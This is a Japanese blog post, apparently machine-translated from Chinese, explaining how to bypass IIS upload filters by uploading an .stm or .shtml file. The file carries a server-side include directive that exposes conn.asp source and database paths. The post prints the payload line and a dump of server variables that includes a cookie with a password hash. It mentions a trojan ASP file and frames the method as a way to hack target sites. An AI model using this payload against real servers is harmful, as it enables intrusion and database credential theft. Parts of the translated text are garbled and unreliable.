1. ホーム
  2. Web プログラミング
  3. セキュリティ関連

asp cer cdx htrファイルのアップロードを許可しないサイトでの解決策!

2022-01-02 10:11:25
先日、lcx兄さんにWebアップロードのアドバイスを求めたところ、stmを使ってアップロードしてもプログラムを実行できるという話をし、理解できないまま、あるコードを渡されました。 
lcx兄さんからいただいたコードをご覧ください。 
stmまたはshtmlで保存して見てくださいと言って、次のように実行します。 
 HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_ AGENT:Mozilla/4. 0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1. 4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ= JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 
現在のファイル名: F:\Web1.stm 
Webサーバー名とバージョン:Microsoft-IIS/5.0 
ホスト名:localhost 
ポート:80 
クライアントまたはクライアントエージェントのIPアドレス:127.0.0.1 
カスタマーまたはカスタマーエージェントのホスト名:127.0.0.1 
PATH_INFO の値ですが、仮想パスが何らかのディレクトリ指定まで拡張されています:F: \Web1.stm 
クライアントが追加のパス情報を与える場合:/1.stm 
image/gif、image/x-xbitmap、image/jpeg、image/pjpeg、application/x-shockwave-flash、application/vnd.ms-powerpoint、application/vnd.ms-excel、application/msword、*/*。
理解できなかった! 
今日、幻影旅団で見た言葉 
引用 
サイトがasp cer cdx htrなどのアップロードを許可しない場合、コンテンツのあるstmファイルをアップロードする。 
<! --#include file="conn.asp"--> 
この stm ファイルを直接リクエストすると、conn.asp が表示され、データベースのパスもそこにあります!
そして、shtmlの紹介文を読んで、「やっとわかった!」と思い知らされました。 
という上記の通りであることが判明しました。 
[color=Green]<! --#include file="conn.asp"--> 
  はSSIディレクティブで、その役割は "info.htm" にあります。訪問者がブラウズするために来るとき、現在のページの内容をコピーして、コンテンツが表示された info.htm のような他のHTMLドキュメントが表示されます。[
ローカルでのテストがうまくいきました iis ディレクトリに test.stm ファイルを作成し、次の内容を記述しました。 
<! --#include file="ok.asp"--> 
トロイの木馬のもう一つのファイルok.aspが同じディレクトリに置かれた。 
ブラウザでtest.stmをリクエストしても、何も反映されず、空白のままです。 
しかし、一度ソースコードを確認したら、めまいがしました!私のaspファイルの内容であることが判明しました。 
というわけで、これを使ってハックしたいWebのconnファイルを取得し、データベースのパスを取得します。 
ただし、前提条件として、サーバーのstmやshtmlの拡張子が削除されていないことが必要です 
lcx兄さんからのご指導、本当にありがとうございました!